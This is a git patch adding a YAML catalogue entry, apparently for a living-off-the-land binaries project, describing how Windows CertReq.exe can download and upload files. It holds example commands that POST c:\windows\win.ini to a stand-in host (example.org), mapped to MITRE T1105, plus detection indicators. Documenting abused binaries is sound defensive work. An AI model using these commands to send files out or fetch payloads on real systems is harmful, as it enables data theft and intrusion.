From aa88bf814468b9cbb8be7a51d629364ce14403b6 Mon Sep 17 00:00:00 2001
From: "@dtmsecurity" <dtm@dtm.uk>
Date: Tue, 7 Jul 2020 21:09:06 +0100
Subject: [PATCH] Create certreq.yml

---
 yml/OSBinaries/certreq.yml | 36 ++++++++++++++++++++++++++++++++++++
 1 file changed, 36 insertions(+)
 create mode 100644 yml/OSBinaries/certreq.yml

diff --git a/yml/OSBinaries/certreq.yml b/yml/OSBinaries/certreq.yml
new file mode 100644
index 0000000..b02f001
--- /dev/null
+++ b/yml/OSBinaries/certreq.yml
@@ -0,0 +1,36 @@
+---
+Name: CertReq.exe
+Description: Used for requesting and managing certificates
+Author: 'David Middlehurst'
+Created: '2020-07-07'
+Commands:
+  - Command: CertReq -Post -config https://example.org/ c:\windows\win.ini output.txt
+    Description: Save the response from a HTTP POST to the endpoint https://example.org/ as output.txt in the current directory
+    Usecase: Download file from Internet
+    Category: Download
+    Privileges: User
+    MitreID: T1105
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1105
+    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
+  - Command: CertReq -Post -config https://example.org/ c:\windows\win.ini and show response in terminal
+    Description: Send the file c:\windows\win.ini to the endpoint https://example.org/ via HTTP POST
+    Usecase: Upload
+    Category: Upload
+    Privileges: User
+    MitreID: T1105
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1105
+    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
+Full_Path:
+  - Path: C:\Windows\System32\certreq.exe
+  - Path: C:\Windows\SysWOW64\certreq.exe
+Code_Sample: 
+  - Code:
+Detection:
+  - IOC: certreq creates new files
+  - IOC: certreq makes POST requests
+Resources:
+  - Link: https://dtm.uk/certreq
+Acknowledgement:
+  - Person: David Middlehurst
+    Handle: '@dtmsecurity'
+---
\ No newline at end of file